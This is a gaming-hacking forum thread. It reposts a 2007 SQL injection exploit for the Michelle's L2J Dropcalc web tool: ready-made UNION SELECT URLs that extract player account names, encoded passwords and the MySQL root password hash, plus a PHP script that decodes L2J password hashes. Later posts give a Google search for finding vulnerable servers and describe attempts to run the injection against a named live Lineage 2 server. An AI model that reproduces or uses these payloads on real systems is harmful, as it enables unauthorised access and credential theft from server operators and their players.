Jump to content

[Exploit] SQL Injection!


caesar4l2

Recommended Posts

#==============================================================================================
#  Title: Michelle's L2J Dropcalc
#  Version: <= v4
#  Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm
#
#  Discovered By: Codebreak (codebreak1984@gmail.com | www.codebreak.tk)
#
#==============================================================================================
#  SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
#  http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[sql]
#
#  Example:
#
#   Obtain a player username:
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
#   Obtain a password for that username (*** encrypted): 
#    * only valid if loginserver and gameserver are in the same machine
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"
#
#
#  Bonus:
#   
#   Obtain MYSQL Password (encrypted):
#    *only valid if the script is executed with root accounts.
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
#
#   *** L2J Encrypted Password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file
#
###############################################################################################


<--------- Beginning of PHP Script --------->

<style type="text/css">
<!--
.style3 {font-size: 24px}
.style1 {color: #CC0000}
-->
</style>
<?
echo("<title>L2J Pass Decoding - POC</title>");
$pass = $_POST['decode']; 
$unpass3 = base64_decode($pass);


$array = unpack("H*", $unpass3);
foreach ($array as $key => $value)
$unpass2 = $array[1];


echo("<span class=style1><b><u>Decoding Password</u></b></span>");

echo("<br><b>Base 64:</b> $pass<br>");
echo("<b>Unpacked:</b> $unpass3<br>");
echo("<br><b>SHA1:</b> $unpass2<br>");
?>
<form name="form1" method="post" action="">
  <div align="center">
    <input type="text" name="decode">
    <input type="submit" value="Decode">
  </div>
</form>
<br><br><br><center><i>Created by Codebreak</center></i>

<------------- End of Script ------------->

# milw0rm.com [2007-01-31]

 

c/p from milworm, notice that i've not made it to work if someone make it work pls share the how-to

i've tried on www.cfl2.eu but i think i'm missing something.. dunno what btw!

 

the guide is in code tag, however i report i t here:

This exploit can be used by Web Browser only for server which supports and have Michelle's L2J Dropcalc running:

#  SQL Injection: (*** Must be logged in, using your own username and Token ***)

#

#  http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=


#

#  Example:

#

#   Obtain a player username:

#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

#

#   Obtain a password for that username (*** encrypted):

#    * only valid if loginserver and gameserver are in the same machine

#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"

#

#

#  Bonus:

#   

#   Obtain MYSQL Password (encrypted):

#    *only valid if the script is executed with root accounts.

#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"[/b]

 

as you can see is pretty easy to do, just I don't get it to work, hope someone can help

asap i've decreased post to 500 :P

 

EDIT: decreased again, pls someone try this..

 

caesar

Link to comment
Share on other sites

omg 1000 posts ... n/c xD

 

Keep spamming n/c u will see ;)

 

XxRxX u know how SQL Injection works no? if u dont have bad memory there it was an explanations some where over the forum

 

@caesar4l2

 

any way give us 1 mini guide of how to use it ;P If this even work in 1 server i think u could be rewarded

 

Link to comment
Share on other sites

That's ancient. Just check the release date.

2007-01-31

 

Plus, it's for very specific L2J servers with a web server that will allow SQL injection. Too specific exploit... don't think it's gonna work anywhere. For a successful SQL injection, you must craft your own queries, those c/p stuff won't work unless it details on which application this is used for and what version... very, very specific.

Link to comment
Share on other sites

That's ancient. Just check the release date.

2007-01-31

 

Plus, it's for very specific L2J servers with a web server that will allow SQL injection. Too specific exploit... don't think it's gonna work anywhere. For a successful SQL injection, you must craft your own queries, those c/p stuff won't work unless it details on which application this is used for and what version... very, very specific.

 

i think that if the server you play on its not too much customized and GMs are a little bit "stupid" the trick is easy to do

 

for example the server in which i tried is using l2jfree so in place of "name"  i must put "char_name" as in characters.sql table is shown

 

and, yes its old, but Michelle's L2J Dropcalc its still at the same versione (4 at least for the server I mentioned in 1st post)

 

so thats it, no one wonna try? XD

Link to comment
Share on other sites

Well.. if you google for "inurl:i-search.php dropcalc" you'll find a few servers using it... ;)

Not gonna try it, I don't like L2J servers anyway... but a few servers still use it, maybe it'll still work..

Link to comment
Share on other sites

[hide]

Well.. if you google for "inurl:i-search.php dropcalc" you'll find a few servers using it... ;)

Not gonna try it, I don't like L2J servers anyway... but a few servers still use it, maybe it'll still work..

 

Results 1 - 7 Of 7

 

xD well if u say this is usless ..

 

m.. ok then if u find a server just tell us xD

Link to comment
Share on other sites

 

almost all chronicle, the server i'm trying in its gracia and the version of the dropcalc its stil the v4 so compatible with this milworm --> however i'm not that much experienced with sql injection, i've tried this link (injection):

 

http://dropcalc.cfl2.eu/i-search.php?username=[myuser]&token=[mytoken]&langval=0&server_id=1&skin_id=0&itemid=-1%20UNION%20select%20accout_name%20from%20characters%20where%20char_name%20=%20"juda"

 

still nothing, the page is still loading from alike an hour lol (the %20 are spaces in Ieexplorer 7 it write them like that lol)

Link to comment
Share on other sites

  • 1 month later...
Guest
This topic is now closed to further replies.


×
×
  • Create New...